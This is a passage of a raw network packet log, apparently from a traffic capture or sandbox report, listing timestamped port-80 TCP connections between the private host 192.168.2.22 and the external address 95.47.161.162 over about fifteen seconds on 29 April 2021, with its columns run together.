                                          Apr 29, 2021 08:23:03.294667959 CEST4938380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:03.296247005 CEST4938380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:03.385740995 CEST804938395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:03.419274092 CEST804938395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:03.419409037 CEST4938380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:03.641207933 CEST4938380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:03.642291069 CEST4938480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:03.731034040 CEST804938395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:03.731232882 CEST4938380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:03.732299089 CEST804938495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:03.732400894 CEST4938480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:03.733654976 CEST4938480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:03.823798895 CEST804938495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:03.858052969 CEST804938495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:03.858258963 CEST4938480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.087641954 CEST4938480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.088953972 CEST4938580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.177855015 CEST804938495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:04.177966118 CEST4938480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.178373098 CEST804938595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:04.178510904 CEST4938580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.179527998 CEST4938580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.279042006 CEST804938595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:04.308862925 CEST804938595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:04.309228897 CEST4938580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.544450045 CEST4938580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.545969963 CEST4938680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.633228064 CEST804938595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:04.633330107 CEST4938580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.641465902 CEST804938695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:04.641582966 CEST4938680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.642546892 CEST4938680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.736897945 CEST804938695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:04.770848036 CEST804938695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:04.771066904 CEST4938680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.992526054 CEST4938680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:04.993796110 CEST4938780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.083853960 CEST804938795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:05.083954096 CEST4938780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.084758043 CEST4938780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.087317944 CEST804938695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:05.087377071 CEST4938680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.175317049 CEST804938795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:05.208688974 CEST804938795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:05.208803892 CEST4938780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.431612968 CEST4938780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.433387995 CEST4938880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.521297932 CEST804938895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:05.521421909 CEST4938880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.521861076 CEST4938880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.522373915 CEST804938795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:05.522454023 CEST4938780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.609693050 CEST804938895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:05.644798040 CEST804938895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:05.644908905 CEST4938880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.870449066 CEST4938880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.872925997 CEST4938980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.958538055 CEST804938895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:05.958651066 CEST4938880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.967431068 CEST804938995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:05.967593908 CEST4938980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:05.968904972 CEST4938980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.063698053 CEST804938995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:06.097517967 CEST804938995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:06.097810984 CEST4938980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.322892904 CEST4938980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.325228930 CEST4939080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.414061069 CEST804939095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:06.414243937 CEST4939080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.415041924 CEST4939080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.418158054 CEST804938995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:06.418265104 CEST4938980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.503839970 CEST804939095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:06.537090063 CEST804939095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:06.537420988 CEST4939080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.760013103 CEST4939080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.762294054 CEST4939180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.848756075 CEST804939095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:06.848912001 CEST4939080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.850776911 CEST804939195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:06.850884914 CEST4939180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.852171898 CEST4939180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:06.940704107 CEST804939195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:06.974781990 CEST804939195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:06.975127935 CEST4939180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:07.195167065 CEST4939180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:07.197065115 CEST4939280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:07.284068108 CEST804939195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:07.284159899 CEST4939180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:07.285773039 CEST804939295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:07.285919905 CEST4939280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:07.287061930 CEST4939280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:07.376043081 CEST804939295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:07.410356045 CEST804939295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:07.410737991 CEST4939280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:07.633456945 CEST4939280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:07.639097929 CEST4939380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:07.722673893 CEST804939295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:07.722801924 CEST4939280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:07.734203100 CEST804939395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:07.734323978 CEST4939380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:07.735584021 CEST4939380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:07.830717087 CEST804939395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:07.865125895 CEST804939395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:07.865391970 CEST4939380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.093122959 CEST4939380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.094033957 CEST4939480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.182504892 CEST804939495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:08.182625055 CEST4939480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.183953047 CEST4939480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.188311100 CEST804939395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:08.188424110 CEST4939380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.272701979 CEST804939495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:08.306196928 CEST804939495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:08.306375980 CEST4939480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.538841963 CEST4939480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.541069031 CEST4939580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.626866102 CEST804939495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:08.626986027 CEST4939480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.636359930 CEST804939595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:08.636539936 CEST4939580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.637944937 CEST4939580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.733618021 CEST804939595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:08.766777039 CEST804939595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:08.767115116 CEST4939580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.990241051 CEST4939580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:08.992230892 CEST4939680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.084867954 CEST804939595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:09.084981918 CEST4939580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.086236000 CEST804939695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:09.086477995 CEST4939680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.087733984 CEST4939680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.181888103 CEST804939695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:09.215297937 CEST804939695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:09.215667009 CEST4939680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.442537069 CEST4939680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.444591999 CEST4939780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.535825014 CEST804939795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:09.536025047 CEST4939780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.537179947 CEST804939695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:09.537239075 CEST4939780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.537276030 CEST4939680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.627099037 CEST804939795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:09.661247015 CEST804939795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:09.661454916 CEST4939780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.890912056 CEST4939780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.892590046 CEST4939880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.981431961 CEST804939795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:09.981600046 CEST4939780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.986849070 CEST804939895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:09.986922979 CEST4939880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:09.987718105 CEST4939880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.082823992 CEST804939895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:10.116424084 CEST804939895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:10.116600990 CEST4939880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.341181993 CEST4939880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.342237949 CEST4939980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.433267117 CEST804939995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:10.433454037 CEST4939980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.434529066 CEST4939980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.435617924 CEST804939895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:10.435698032 CEST4939880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.525496960 CEST804939995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:10.562772036 CEST804939995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:10.563102007 CEST4939980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.785273075 CEST4939980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.787003994 CEST4940080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.876003027 CEST804940095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:10.876115084 CEST4940080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.876317024 CEST804939995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:10.876409054 CEST4939980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.877664089 CEST4940080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:10.967220068 CEST804940095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:11.004592896 CEST804940095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:11.004782915 CEST4940080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:11.237157106 CEST4940080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:11.239311934 CEST4940180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:11.328296900 CEST804940095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:11.328330040 CEST804940195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:11.328425884 CEST4940080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:11.328481913 CEST4940180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:11.329940081 CEST4940180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:11.421694994 CEST804940195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:11.454822063 CEST804940195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:11.454929113 CEST4940180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:11.695375919 CEST4940180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:11.697765112 CEST4940280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:11.786725044 CEST804940195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:11.786825895 CEST4940180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:11.789010048 CEST804940295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:11.789140940 CEST4940280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:11.790491104 CEST4940280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:11.880709887 CEST804940295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:11.914313078 CEST804940295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:11.914614916 CEST4940280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:12.142045975 CEST4940280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:12.144176960 CEST4940380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:12.231518030 CEST804940295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:12.231612921 CEST4940280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:12.233556986 CEST804940395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:12.233701944 CEST4940380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:12.235331059 CEST4940380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:12.325320005 CEST804940395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:12.359030962 CEST804940395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:12.359277010 CEST4940380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:12.586378098 CEST4940380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:12.587220907 CEST4940480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:12.676146030 CEST804940395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:12.676275015 CEST4940380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:12.682049036 CEST804940495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:12.682216883 CEST4940480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:12.683267117 CEST4940480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:12.777720928 CEST804940495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:12.812541008 CEST804940495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:12.812751055 CEST4940480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.043065071 CEST4940480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.044982910 CEST4940580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.141520023 CEST804940495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:13.141567945 CEST804940595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:13.141664982 CEST4940480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.141710997 CEST4940580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.142980099 CEST4940580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.237807989 CEST804940595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:13.271701097 CEST804940595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:13.271970987 CEST4940580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.501008987 CEST4940580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.503400087 CEST4940680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.596642017 CEST804940595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:13.596959114 CEST4940580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.598243952 CEST804940695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:13.598380089 CEST4940680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.599517107 CEST4940680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.694469929 CEST804940695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:13.728627920 CEST804940695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:13.728898048 CEST4940680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.951951027 CEST4940680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:13.954360008 CEST4940780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.048774958 CEST804940695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:14.048888922 CEST804940795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:14.049036980 CEST4940680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.049135923 CEST4940780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.050673962 CEST4940780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.144846916 CEST804940795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:14.178497076 CEST804940795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:14.178750038 CEST4940780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.404387951 CEST4940780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.406867981 CEST4940880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.499519110 CEST804940795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:14.499624968 CEST4940780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.502554893 CEST804940895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:14.502656937 CEST4940880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.503915071 CEST4940880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.598505974 CEST804940895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:14.632711887 CEST804940895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:14.632980108 CEST4940880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.849730015 CEST4940880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.850717068 CEST4940980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.944789886 CEST804940895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:14.944875956 CEST4940880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.945488930 CEST804940995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:14.945580959 CEST4940980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:14.946423054 CEST4940980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.040785074 CEST804940995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:15.074197054 CEST804940995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:15.074383974 CEST4940980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.306165934 CEST4940980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.307907104 CEST4941080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.397530079 CEST804941095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:15.397651911 CEST4941080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.399101019 CEST4941080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.401521921 CEST804940995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:15.401621103 CEST4940980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.489609957 CEST804941095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:15.522481918 CEST804941095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:15.522598982 CEST4941080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.746174097 CEST4941080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.748076916 CEST4941180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.837599993 CEST804941095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:15.837642908 CEST804941195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:15.837770939 CEST4941180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.837776899 CEST4941080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.839217901 CEST4941180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:15.929708004 CEST804941195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:15.961679935 CEST804941195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:15.961913109 CEST4941180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:16.188971043 CEST4941180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:16.190386057 CEST4941280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:16.277879000 CEST804941195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:16.278033972 CEST4941180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:16.280225992 CEST804941295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:16.280318975 CEST4941280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:16.281735897 CEST4941280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:16.370982885 CEST804941295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:16.405208111 CEST804941295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:16.405428886 CEST4941280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:16.634852886 CEST4941280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:16.636548996 CEST4941380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:16.724320889 CEST804941295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:16.724417925 CEST4941280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:16.725260973 CEST804941395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:16.725447893 CEST4941380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:16.726711035 CEST4941380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:16.816365957 CEST804941395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:16.850367069 CEST804941395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:16.850702047 CEST4941380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.072827101 CEST4941380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.074975967 CEST4941480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.162082911 CEST804941395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:17.162189960 CEST4941380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.169312000 CEST804941495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:17.169409990 CEST4941480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.170702934 CEST4941480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.265360117 CEST804941495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:17.299146891 CEST804941495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:17.299498081 CEST4941480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.519171953 CEST4941480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.520421028 CEST4941580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.614773035 CEST804941495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:17.614947081 CEST4941480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.615353107 CEST804941595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:17.615519047 CEST4941580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.616823912 CEST4941580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.710911036 CEST804941595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:17.746145964 CEST804941595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:17.746305943 CEST4941580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.977087021 CEST4941580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:17.979147911 CEST4941680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:18.071016073 CEST804941695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:18.071126938 CEST4941680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:18.072494030 CEST4941680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:18.073824883 CEST804941595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:18.073982954 CEST4941580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:18.164464951 CEST804941695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:18.198662996 CEST804941695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:18.198868036 CEST4941680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:18.429493904 CEST4941680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:18.431562901 CEST4941780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:18.520230055 CEST804941695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:18.520313978 CEST4941680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:18.525863886 CEST804941795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:18.526034117 CEST4941780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:18.527034044 CEST4941780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:23:18.621228933 CEST804941795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:23:18.657521963 CEST804941795.47.161.162192.168.2.22
